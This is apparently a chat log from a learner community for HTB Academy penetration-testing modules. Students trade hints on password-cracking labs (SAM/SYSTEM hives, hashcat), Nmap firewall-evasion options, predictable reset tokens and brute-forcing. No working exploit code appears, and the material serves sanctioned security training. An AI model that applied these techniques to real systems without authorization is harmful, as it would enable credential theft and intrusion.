I need a little help with Password Attacks Lab - Hard, I got the password for the vhd file, mounted it on a Windows, but the two files in it are illegible as far as I can tell. I've tried using registryspy, reglookup, and just going through the strings. I can't find anything of value... Has anyone been able to complete this one? Could I get a hint?
anyone did the
VULNERABILITY ASSESSMENT == Nessus Skills Assessment
What were the targets for the authenticated scan?
@summer lava ||the answer is just a single IP address :)||
Got it... that was the same address i was given to scan
🙂
Verify per #welcome then you can do images
Is there an module that covers pinging?
dm me
@here Anyone can help me a little with Password attacks easy lab i tried all the user from the inlane website no luck so far even tried username anarchy i am using the passwd file available in the resource. any hints?
Is there a way to reset the potfile that hashcat writes to when it scans a hash file? I keep coming up exhausted when trying to crack the NTDS file in the Skills Assessment for Cracking Passwords with Hashcat, because I didn't use the flags at the beginning.
hi what section are you on
Hi guys,
After finishing the module Network Enumeration with Nmap i understood:
=>Scanning hosts on a network
=>Scanning ports of a host
=>How Nmap options control the messages sent to the target (deactivating ARP packets, ICMP echo, sending ACK ... )
=>When to use each option, for example sending ACK packets to bypass firewalls.
=>Using port 53 as a source port, as it allows dns udp connection
Additional tips:
=> Each OS by default uses a specific TTL when creating their packets. This may help knowing the OS by looking at the TTL of the packets they create
=> Firewalls can be bypassed by ACK packets because they do not know if the packet is from the target or the attacker
=> DNS allows UDP connections that can be used (by connection with source port 53 by default) to have more information about a target
Performance:
=> Nmap has an option that makes it less noisy
=> Nmap can control the timeouts and RTT of the packets it sends to make fast scans
i don't know what need the closest thing i can find is --potfile-disable or if you want to delete the hashcat potfile go in to ~/.hashcat delete the file "hashcat.potfile" or rename it to something else if you still need it
Sweet, thanks!
for the wordlist use both username and password list from the resource and did you try ||ftp||
So I used losetup and then dislocker to mount the vhd file on my Linux but I’m still stuck with these two windows registry files that I can’t do anything with. I’ve tried reged, registery-read, reglookup, regreader… not getting legible results, can someone tell me if I’m heading in the right direction with this one? Am I supposed to be able to read the registry files somehow??
did you see the ||SAM|| and ||SYSTEM|| files?
@wind plaza try to read again
Hi,
I am stuck on Broken Authentication - Predictable Reset Token, first question.
I can't figure how to reproduce show token for htbuser using the algo. I am using strtotime(2022-08-04 01:15:52pm) * 1000 to convert to epoch with milliseconds. Maybe this is where i am wrong.
Can someone help ?
try thinking at the command for the terminal
Hi i'm stuck in the Attacking common services module, in the sql section, i can't find the password for the mssqlsvc user because all the databases are not accessible. any hints?
Hi!!
If any can help, most appreciated!
I got stuck on the Microsoft Fundamentals module, NTFS vs Shared Points section.
I have to set up a mount point with the given cmd, but when I do, it doesn't work. I tried using sudo apt-get cifs and update, but it get an error and doesn't really update either.
Any help?
I find something i can't understand, I use metasploit and try to get shell on the target. I success when I use the pwn box , but I failed when I use my own computer with vpn, do anyone know why?
both of the machine can reach the target machine
Have you found any solution?
Yeah, DM me. I'll text you when I get home in an hour or two 🙂
The token can deviate by one second. But this can happen in both directions. Time -/+ 1 second
@rocky surge let me guess, network chuck and cubes scam again?
👀
yeah he try to scam me before, i troll him for a bit and reported him to pwning
yes he is now on vacation 
I'm currently on module 35 section 223 trying to anwer the questions. However, I can't access any external services (CDNs) and so I'm getting a broken site and have an extremely slow connection - What should I do now?
Here's what the website looks like
if you are asking something related to htb academy, use module and section name, don't use number and for this you can just use your browser instead of the browser in pwnbox
Where do I find them?
(the names)
your browser?
oh check on top of the page
"Web Requests" "HTTP Headers"
yep module Web Requests and section HTTP Headers
okay seems to work - why doesn't the browser in the pwnbox work though?
yes but your browser is faster or my pwnbox is slow
Why is the pwnbox so slow?
I mean it's sooo slow that the browser timeouts
so for Broken Authentication / Guessable Answers, I'm stuck on brute forcing it - looks like a few people just guessed the answer, but I'd like to figure out breaking it - i have the script to do it, just not finding the right wordlist. Can anyone give me a nudge? I've not "manually" guessed it either
What addressing mechanism is used at the Link Layer of the TCP/IP model? Hint: it's not IP.
It's in the text. I believe you have to write it without the "ing" at the end.
got it - shout if anyone wants a hand
Anybody here going to defcon?
i subscribed for the silver subscription which is +200 cubes each month but i didn't get any cubes, does it mean i get it next month?